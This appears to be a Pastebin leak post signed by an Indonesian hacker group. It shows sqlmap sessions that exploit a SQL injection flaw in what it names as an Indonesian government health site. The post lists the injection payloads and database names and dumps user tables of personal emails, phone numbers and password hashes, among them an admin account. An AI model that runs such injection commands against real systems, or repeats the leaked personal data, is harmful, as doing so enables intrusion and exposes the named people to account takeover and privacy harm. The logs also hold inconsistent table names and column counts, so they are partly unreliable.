Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [-----------------------]
- #Leaked By : RussX9
- # FB : https://www.facebook.com/405forbiden
- # email : Russx9@gmail.com | Russx9@Linuxmail.org
- #Indonesian Hacker Cyber team
- # YunoGasai | Dr.1n73ction | 404_Proxy | Larva_ROOT | Dandi Dot ID | FR_Dot_Id | Killuax404 | X-GHOST404 | TRUTH404 | Mr.Al404 |3xpl01t1n6 | Bl4ckUmbrell4_404 | umar dot id | Dzikri Dot ID | Haxor_Dd05 | riko_sinkadorable
- [-]-----------------------[+]
- [+]==================[+]
- Greatz To : Indonesian BLACKHATS CYBER TEAM , Odong-Odong UNDERGROUND , Mauritania Hacker Team
- Root@Greatz#~ > ./Na-Z ./Sickpeoples ./SvN_Nevermore ./Mr.ApaPedulimu ./Anzi007 ./Mr.SaputraAttackerXX ./D22 ./Sakinah ./cybercrows ./RkeNz_007 ./MoXat ./BL4CK_GHOST
- [+]==================[+]
- root@localhost:~# sqlmap -u http://Depkes.go.id/article.php?id=sensor --dbs
- sqlmap/1.0-dev - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 02:47:03
- [02:47:03] [INFO] resuming back-end DBMS 'mysql'
- [02:47:03] [INFO] testing connection to the target URL
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=332' AND 6287=6287 AND 'Akdb'='Akdb
- Type: UNION query
- Title: MySQL UNION query (NULL) - 8 columns
- Payload: id=332' UNION ALL SELECT NULL,CONCAT(0x7167757071,0x754670726e627345537a,0x7162756571),NULL,NULL,NULL,NULL,NULL,NULL#
- ---
- [02:47:05] [INFO] the back-end DBMS is MySQL
- web server operating system: Linux Debian 6.0 (squeeze)
- web application technology: PHP 5.3.3, Apache 2.2.16
- back-end DBMS: MySQL 5
- [02:47:05] [INFO] fetching database names
- available databases [3]:
- [*] information_schema
- [*] portal
- [*] project_newgosid
- root@localhost:~# sqlmap -u http://depkes.go.id/article.php?id=sensor -D Portal -T ant_sys_user --dump
- sqlmap/1.0-dev - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 02:49:44
- [02:49:44] [INFO] resuming back-end DBMS 'mysql'
- [02:49:44] [INFO] testing connection to the target URL
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=332' AND 6287=6287 AND 'Akdb'='Akdb
- Type: UNION query
- Title: MySQL UNION query (NULL) - 8 columns
- Payload: id=332' UNION ALL SELECT NULL,CONCAT(0x7167757071,0x754670726e627345537a,0x7162756571),NULL,NULL,NULL,NULL,NULL,NULL#
- ---
- [02:49:46] [INFO] the back-end DBMS is MySQL
- web server operating system: Linux Debian 6.0 (squeeze)
- web application technology: PHP 5.3.3, Apache 2.2.16
- back-end DBMS: MySQL 5
- [02:49:46] [INFO] fetching tables for database: 'Portal'
- Database: portal
- Table: ants_sys_user
- [4 entries]
- +------------------------+--------------+----------------+-----------+----------------------------------+
- | email_address | phone_number | user_full_name | user_name | user_password |
- +------------------------+--------------+----------------+-----------+----------------------------------+
- | suwanto.ants@yahoo.com | 085717389000 | Suwanto | Suwanto | ebbf35aaa36fc8caf5f810aa83fa49e3 |
- | nuning_sg@yahoo.com | 08129516082 | nuning | nuning | 14e50d9f59d66f5e4a5e8e134973bf1a |
- | unknown | unknown | ismail | ismail | edd13a0018ac0d2e71f827125b1b3532 |
- | m.isti@yahoo.com | 08128512730 | istiqomah | isti | 42a1e5c0481df236f8774677b2b65188 |
- +------------------------+--------------+----------------+-----------+----------------------------------+
- [02:49:46] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.depkes.go.id'
- [*] shutting down at 02:49:46
- root@localhost:~# sqlmap -u http://depkes.go.id/article.php?id=sensor -D Portal -t joy_users --Dump
- sqlmap/1.0-dev - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 02:49:44
- [02:49:44] [INFO] resuming back-end DBMS 'mysql'
- [02:49:44] [INFO] testing connection to the target URL
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=332' AND 6287=6287 AND 'Akdb'='Akdb
- Type: UNION query
- Title: MySQL UNION query (NULL) - 1 columns
- Payload: id=332' UNION ALL SELECT NULL,CONCAT(0x7167757071,0x754670726e627345537a,0x7162756571),NULL,NULL,NULL,NULL,NULL,NULL#
- ---
- [02:49:46] [INFO] the back-end DBMS is MySQL
- web server operating system: Linux Debian 6.0 (squeeze)
- web application technology: PHP 5.3.3, Apache 2.2.16
- back-end DBMS: MySQL 5
- [02:49:46] [INFO] fetching tables for database: 'Portal'
- Database: portal
- Table: jos_users
- [1 entry]
- +--------------------+-------------------------------------------------------------------+----------+
- | email | password | username |
- +--------------------+-------------------------------------------------------------------+----------+
- | adhityar@yahoo.com | 35d1b3c70e13825c0d4a67843adbf6ef:sQEMDKp8NKGSLMMKP5DocOSMwO1uCV3l | admin |
- +--------------------+-------------------------------------------------------------------+----------+
- [*] Shuting Down At : 02:59:12
- Root@Localhost#~
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement